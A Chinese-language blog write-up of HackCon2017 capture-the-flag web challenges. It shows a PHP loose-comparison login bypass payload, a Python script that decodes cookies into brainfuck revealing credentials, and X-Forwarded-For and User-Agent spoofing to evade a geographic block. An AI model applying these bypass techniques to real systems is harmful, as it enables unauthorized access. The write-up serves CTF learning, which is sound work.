Chybeta

HackCon2017-Web-writeup

发表于 | 分类于 | 阅读次数

HackCon2017-Web-writeup

Noobcoder

1
2
3
4
5
A junior recently started doing PHP, and makes some random shit. He uses gedit as his go-to editor with a black theme thinking it was sublime.
So he made this login portal, I am sure he must have left something out. Why don't you give it a try?
Server: http://defcon.org.in:6062
Note: dirbuster is NOT required for this question

存在文件checker.php~,下载下来后打开:

1
2
3
4
5
6
<?php
if ($_POST["username"] == $_POST["password"] && $_POST["password"] !== $_POST["username"])
	echo "congratulations the flag is d4rk{TODO}c0de";
else
	echo "nice try, but try again";
?>

存在弱类型比较问题,payload:

1
username=0e1&password=0e2

得到flag:

1
d4rk{l0l_g3dit_m4ster_roxx}c0de

Magic

1
2
3
4
5
Everything disappears magically.
Can you magically prevent that?
http://defcon.org.in:6060/index.php
Note: dirbuster is NOT required for this question

有一个登陆框,但初尝后没有发现注入。

抓包看看,有一些奇怪的set-cookie:

将所有的setcookie保存到cookie.txt中,用脚本将其中的字符提取出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import os
import re
from urllib import unquote
content = open("cookie.txt","rb").read()
reg = r'=(.+?); expires='
cookiere = re.compile(reg)
cookielist = re.findall(cookiere,content)
result = ""
for i in cookielist:
	result += unquote(i)
print result

运行后得到:

1
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.--.--------------.+++++++++++++.----.-------------.++++++++++++.--------.<------------.<++.>>----.+.<+++++++++++.+++++++++++++.>+++++++++++++++++.---------------.++++.+++++++++++++++.<<.>>-------.<+++++++++++++++.>+++..++++.--------.+++.<+++.<++++++++++++++++++++++++++.<++++++++++++++++++++++.>++++++++++++++..>+.----.>------.+++++++.--------.<+++.>++++++++++++..-------.++.

用brainfuck编译器解释后:

1
2
λ .\brainfuck.exe
username: abERsdhw password: HHealskdwwpr

得到用户名和密码,登陆,得到flag:

1
d4rk{c00k13s_4r3_fun}c0de

Dictator

1
2
3
4
5
6
A dictator is creating a lot of fuss nowadays by claiming to have nuclear weapons. I somehow got access to his personal website that he uses to send instructions, but I cannot get in. Can you try?
Link: Website(http://defcon.org.in:6063/)
Hint: you need to be living in that country to get access.
Hint2: north korea

直接访问会提示Access denied,修改Accept-Language也没用。

修改X-Forwarded-For为north korea的ip。修改User-Agent为north korea的浏览器NaenaraBrowser。

Stolen Calculator - PWN

1
2
3
I stole this calculator from someone and made some changes because I am the plagiarism god. Bow before me now.
btw wanna try it: http://defcon.org.in:9080/
Hint: This is a pwn challenge
微信扫码加入知识星球【漏洞百出】
chybeta WeChat Pay

点击图片放大,扫码知识星球【漏洞百出】

本文标题:HackCon2017-Web-writeup

文章作者:chybeta

发布时间:2017年08月27日 - 08:08

最后更新:2017年08月29日 - 09:08

原始链接:http://chybeta.github.io/2017/08/27/HackCon2017-Web-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。